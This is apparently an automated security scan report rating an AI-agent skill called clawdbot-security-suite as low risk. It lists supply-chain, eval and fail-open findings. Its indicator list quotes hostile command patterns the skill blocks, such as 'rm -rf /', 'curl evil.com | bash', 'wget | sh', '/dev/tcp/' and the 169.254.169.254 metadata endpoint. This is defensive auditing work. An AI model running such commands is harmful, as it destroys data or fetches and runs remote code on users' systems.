clawdbot-security-suite Security Report — Low Risk | ClawSafe | ClawSafe

10 /100

clawdbot-security-suite

Advanced security validation for Clawdbot - pattern detection, command sanitization, and threat monitoring

Legitimate security validation skill with no malicious behavior - all flagged IOCs are actually legitimate security pattern detection examples correctly shown as threats to block.

Skill Nameclawdbot-security-suite

Duration51.7s

Enginepi

✓

Safe to install

This skill is safe to use. The pre-scan IOCs (rm -rf, curl|bash, /dev/tcp/) are false positives - they appear in documentation and pattern files as examples of threats the skill is designed to DETECT and BLOCK, not execute.

Findings 3 items

Severity	Finding	Location
Low	jq dependency not pinned Supply Chain The skill requires jq binary but does not pin a specific version. Malicious jq versions could compromise the validation logic. `requires: bins: ["jq"]` → Pin jq version in installation docs or bundle jq with the skill	`SKILL.md:12`
Low	eval() usage in documentation examples Doc Mismatch Documentation shows eval() with user input after security check. While documented, this pattern could be dangerous if security validation is bypassed. `eval "$command"` → Use safer execution methods like $command without eval where possible	`skills/security/SKILL.md:56`
Low	Fail-safe permissive defaults Priv Escalation The hook handler allows commands to proceed when security validation fails or the skill is missing. While fail-safe is reasonable, it could allow dangerous commands through. `return { allowed: true }; // Fail-safe: allow if security skill unavailable` → Consider making this configurable - some deployments may prefer to block on validation failure	`hooks/security-validator/handler.ts:53`

Resource	Declared	Inferred	Status	Evidence
Filesystem	`NONE`	`READ`	✓ Aligned	Reads patterns.json and config.json for validation logic
Shell	`NONE`	`NONE`	—	Does NOT execute user commands - only validates them
Network	`NONE`	`NONE`	—	No outbound network requests - all validation is local
Environment	`NONE`	`NONE`	—	Does not read environment variables
Skill Invoke	`READ`	`READ`	✓ Aligned	Invokes security.sh for validation - declared in SKILL.md

6 Critical 1 High 18 findings

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf /

README.md:34

💀

Critical Dangerous Command 危险 Shell 命令

curl evil.com | bash

README.md:34

💀

Critical Dangerous Command 危险 Shell 命令

curl evil.com \| bash

README.md:46

💀

Critical Dangerous Command 危险 Shell 命令

curl | bash

SKILL.md:104

💀

Critical Dangerous Command 危险 Shell 命令

wget | sh

SKILL.md:104

💀

Critical Dangerous Command 危险 Shell 命令

/dev/tcp/

skills/security/patterns.json:22

📡

High IP Address 硬编码 IP 地址

169.254.169.254

README.md:47

🔗

Medium External URL 外部 URL

https://docs.clawd.bot/install

CONTRIBUTING.md:54

🔗

Medium External URL 外部 URL

https://x.com/LexpertAI

CONTRIBUTING.md:184

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/ClawdHub-Install-blue

README.md:5

🔗

Medium External URL 外部 URL

https://clawdhub.com/gtrusler/clawdbot-security-suite

README.md:5

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/License-MIT-green.svg

README.md:6

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/Follow-@LexpertAI-1DA1F2?logo=twitter

README.md:7

🔗

Medium External URL 外部 URL

http://169.254.169.254/metadata

README.md:47

🔗

Medium External URL 外部 URL

http://169.254.169.254/latest/meta-data

SKILL.md:194

🔗

Medium External URL 外部 URL

http://127.0.0.1:8080

hooks/security-validator/HOOK.md:106

🔗

Medium External URL 外部 URL

https://clawdhub.com/gtrusler/clawdbot-security-advanced

skills/security/README.md:5

📧

Info Email 邮箱地址

[email protected]

CONTRIBUTING.md:220

File Tree

18 files · 88.3 KB · 3106 lines

Markdown 10f · 2048L Shell 2f · 414L JSON 5f · 366L TypeScript 1f · 278L

├─ ▾ 📁 hooks

│ └─ ▾ 📁 security-validator

│ ├─ 🔑 config.json ⚠ JSON 35L · 659 B

│ ├─ 📜 handler.ts TypeScript 278L · 9.1 KB

│ └─ 📝 HOOK.md Markdown 122L · 3.2 KB

├─ ▾ 📁 skills

│ └─ ▾ 📁 security

│ ├─ 📝 CLAWDBOT-INSTRUCTIONS.md Markdown 244L · 7.0 KB

│ ├─ 🔑 config.json ⚠ JSON 75L · 1.3 KB

│ ├─ 📝 INSTALL.md Markdown 281L · 7.1 KB

│ ├─ 📋 patterns.json JSON 193L · 4.2 KB

│ ├─ 📝 README.md Markdown 254L · 7.6 KB

│ ├─ 🔧 security-check.sh Shell 158L · 4.4 KB

│ ├─ 🔧 security.sh Shell 256L · 7.4 KB

│ └─ 📝 SKILL.md Markdown 258L · 7.0 KB

├─ 📋 _meta.json JSON 5L · 142 B

├─ 📝 CONTRIBUTING.md Markdown 222L · 6.2 KB

├─ 📝 LICENSE.md Markdown 20L · 1.1 KB

├─ 📋 package.json JSON 58L · 1.6 KB

├─ 📝 README.md Markdown 291L · 9.9 KB

├─ 📝 SECURITY.md Markdown 94L · 3.4 KB

└─ 📝 SKILL.md Markdown 262L · 7.1 KB

Dependencies 1 items

Package	Version	Source	Known Vulns	Notes
`jq`	`*`	system	No	External binary dependency - version not pinned

Security Positives

✓ No data exfiltration - all validation is local

✓ No credential theft - does not access environment or sensitive paths

✓ No reverse shell or C2 communication

✓ Comprehensive pattern coverage for security threats

✓ All pre-scan IOCs are FALSE POSITIVES - patterns correctly identify what to BLOCK

✓ Open source with transparent detection logic

✓ Privacy-first design with no telemetry

✓ Security patterns include SSRF, command injection, path traversal, and prompt injection detection